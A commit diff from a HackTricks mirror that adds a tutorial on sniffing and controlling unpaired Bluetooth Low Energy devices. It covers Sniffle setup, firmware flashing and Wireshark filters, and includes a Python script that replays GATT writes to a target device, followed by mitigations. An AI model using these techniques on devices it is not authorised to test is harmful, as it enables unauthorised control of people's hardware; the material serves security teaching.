mirror of
				https://github.com/HackTricks-wiki/hacktricks.git
				synced 2025-10-10 18:36:50 +00:00 
			
		
		
		
	Add content from: Start hacking Bluetooth Low Energy today! (part 2)
This commit is contained in:
		
							parent
							
								
									7b609aef63
								
							
						
					
					
						commit
						4501b98594
					
				| @ -70,7 +70,135 @@ sudo bettercap --eval "ble.recon on" | ||||
| >> ble.write <mac address of device> ff06 68656c6c6f # Write "hello" in ff06 | ||||
| ``` | ||||
| 
 | ||||
| ## Sniffing and actively controlling unpaired BLE devices | ||||
| 
 | ||||
| Many low-cost BLE peripherals do not enforce pairing/bonding. Without bonding, the Link Layer encryption is never enabled, so ATT/GATT traffic is in cleartext. An off-path sniffer can follow the connection, decode GATT operations to learn characteristic handles and values, and any nearby host can then connect and replay those writes to control the device. | ||||
| 
 | ||||
| ### Sniffing with Sniffle (CC26x2/CC1352) | ||||
| 
 | ||||
| Hardware: a Sonoff Zigbee 3.0 USB Dongle Plus (CC26x2/CC1352) re-flashed with NCC Group’s Sniffle firmware. | ||||
| 
 | ||||
| Install Sniffle and its Wireshark extcap on Linux: | ||||
| 
 | ||||
| ```bash | ||||
| if [ ! -d /opt/sniffle/Sniffle-1.10.0/python_cli ]; then | ||||
|   echo "[+] - Sniffle not installed! Installing at 1.10.0..." | ||||
|   sudo mkdir -p /opt/sniffle | ||||
|   sudo chown -R $USER:$USER /opt/sniffle | ||||
|   pushd /opt/sniffle | ||||
|   wget https://github.com/nccgroup/Sniffle/archive/refs/tags/v1.10.0.tar.gz | ||||
|   tar xvf v1.10.0.tar.gz | ||||
|   # Install Wireshark extcap for user and root only | ||||
|   mkdir -p $HOME/.local/lib/wireshark/extcap | ||||
|   ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py $HOME/.local/lib/wireshark/extcap | ||||
|   sudo mkdir -p /root/.local/lib/wireshark/extcap | ||||
|   sudo ln -s /opt/sniffle/Sniffle-1.10.0/python_cli/sniffle_extcap.py /root/.local/lib/wireshark/extcap | ||||
|   popd | ||||
| else | ||||
|   echo "[+] - Sniffle already installed at 1.10.0" | ||||
| fi | ||||
| ``` | ||||
| 
 | ||||
| Flash Sonoff with Sniffle firmware (ensure your serial device matches, e.g. /dev/ttyUSB0): | ||||
| 
 | ||||
| ```bash | ||||
| pushd /opt/sniffle/ | ||||
| wget https://github.com/nccgroup/Sniffle/releases/download/v1.10.0/sniffle_cc1352p1_cc2652p1_1M.hex | ||||
| git clone https://github.com/sultanqasim/cc2538-bsl.git | ||||
| cd cc2538-bsl | ||||
| python3 -m venv .venv | ||||
| source .venv/bin/activate | ||||
| python3 -m pip install pyserial intelhex | ||||
| python3 cc2538-bsl.py -p /dev/ttyUSB0 --bootloader-sonoff-usb -ewv ../sniffle_cc1352p1_cc2652p1_1M.hex | ||||
| deactivate | ||||
| popd | ||||
| ``` | ||||
| 
 | ||||
| Capture in Wireshark via the Sniffle extcap and quickly pivot to state-changing writes by filtering: | ||||
| 
 | ||||
| ```text | ||||
| _ws.col.info contains "Sent Write Command" | ||||
| ``` | ||||
| 
 | ||||
| This highlights ATT Write Commands from the client; the handle and value often directly map to device actions (e.g., write 0x01 to a buzzer/alert characteristic, 0x00 to stop). | ||||
| 
 | ||||
| Sniffle CLI quick examples: | ||||
| 
 | ||||
| ```bash | ||||
| python3 scanner.py --output scan.pcap | ||||
| # Only devices with very strong signal | ||||
| python3 scanner.py --rssi -40 | ||||
| # Filter advertisements containing a string | ||||
| python3 sniffer.py --string "banana" --output sniff.pcap | ||||
| ``` | ||||
| 
 | ||||
| Alternative sniffer: Nordic’s nRF Sniffer for BLE + Wireshark plugin also works. On small/cheap Nordic dongles you typically overwrite the USB bootloader to load the sniffer firmware, so you either keep a dedicated sniffer dongle or need a J-Link/JTAG to restore the bootloader later. | ||||
| 
 | ||||
| ### Active control via GATT | ||||
| 
 | ||||
| Once you’ve identified a writable characteristic handle and value from the sniffed traffic, connect as any central and issue the same write: | ||||
| 
 | ||||
| - With Nordic nRF Connect for Desktop (BLE app): | ||||
|   - Select the nRF52/nRF52840 dongle, scan and connect to the target. | ||||
|   - Browse the GATT database, locate the target characteristic (often has a friendly name, e.g., Alert Level). | ||||
|   - Perform a Write with the sniffed bytes (e.g., 01 to trigger, 00 to stop). | ||||
| 
 | ||||
| - Automate on Windows with a Nordic dongle using Python + blatann: | ||||
| 
 | ||||
| ```python | ||||
| import time | ||||
| import blatann | ||||
| 
 | ||||
| # CONFIG | ||||
| COM_PORT = "COM29"  # Replace with your COM port | ||||
| TARGET_MAC = "5B:B1:7F:47:A7:00"  # Replace with your target MAC | ||||
| 
 | ||||
| target_address = blatann.peer.PeerAddress.from_string(TARGET_MAC + ",p") | ||||
| 
 | ||||
| # CONNECT | ||||
| ble_device = blatann.BleDevice(COM_PORT) | ||||
| ble_device.configure() | ||||
| ble_device.open() | ||||
| print(f"[-] Connecting to {TARGET_MAC}...") | ||||
| peer = ble_device.connect(target_address).wait() | ||||
| if not peer: | ||||
|     print("[!] Connection failed.") | ||||
|     ble_device.close() | ||||
|     raise SystemExit(1) | ||||
| 
 | ||||
| print("Connected. Discovering services...") | ||||
| peer.discover_services().wait(5, exception_on_timeout=False) | ||||
| 
 | ||||
| # Example: write 0x01/0x00 to a known handle | ||||
| for service in peer.database.services: | ||||
|     for ch in service.characteristics: | ||||
|         if ch.handle == 0x000b:  # Replace with your handle | ||||
|             print("[!] Beeping.") | ||||
|             ch.write(b"\x01") | ||||
|             time.sleep(2) | ||||
|             print("[+] And relax.") | ||||
|             ch.write(b"\x00") | ||||
| 
 | ||||
| print("[-] Disconnecting...") | ||||
| peer.disconnect() | ||||
| peer.wait_for_disconnect() | ||||
| ble_device.close() | ||||
| ``` | ||||
| 
 | ||||
| ### Operational notes and mitigations | ||||
| 
 | ||||
| - Prefer Sonoff+Sniffle on Linux for robust channel hopping and connection following. Keep a spare Nordic sniffer as a backup. | ||||
| - Without pairing/bonding, any nearby attacker can observe writes and replay/craft their own to unauthenticated writable characteristics. | ||||
| - Mitigations: require pairing/bonding and enforce encryption; set characteristic permissions to require authenticated writes; minimize unauthenticated writable characteristics; validate GATT ACLs with Sniffle/nRF Connect. | ||||
| 
 | ||||
| ## References | ||||
| 
 | ||||
| - [Start hacking Bluetooth Low Energy today! (part 2) – Pentest Partners](https://www.pentestpartners.com/security-blog/start-hacking-bluetooth-low-energy-today-part-2/) | ||||
| - [Sniffle – A sniffer for Bluetooth 5 and 4.x LE](https://github.com/nccgroup/Sniffle) | ||||
| - [Firmware installation for Sonoff USB Dongle (Sniffle README)](https://github.com/nccgroup/Sniffle?tab=readme-ov-file#firmware-installation-sonoff-usb-dongle) | ||||
| - [Sonoff Zigbee 3.0 USB Dongle Plus (ZBDongle-P)](https://sonoff.tech/en-uk/products/sonoff-zigbee-3-0-usb-dongle-plus-zbdongle-p) | ||||
| - [Nordic nRF Sniffer for Bluetooth LE](https://www.nordicsemi.com/Products/Development-tools/nRF-Sniffer-for-Bluetooth-LE) | ||||
| - [nRF Connect for Desktop](https://www.nordicsemi.com/Products/Development-tools/nRF-Connect-for-desktop) | ||||
| - [blatann – Python BLE library for Nordic devices](https://blatann.readthedocs.io/en/latest/) | ||||
| 
 | ||||
| {{#include ../../banners/hacktricks-training.md}} | ||||
| 
 | ||||
| 
 | ||||
| 
 | ||||
|  | ||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user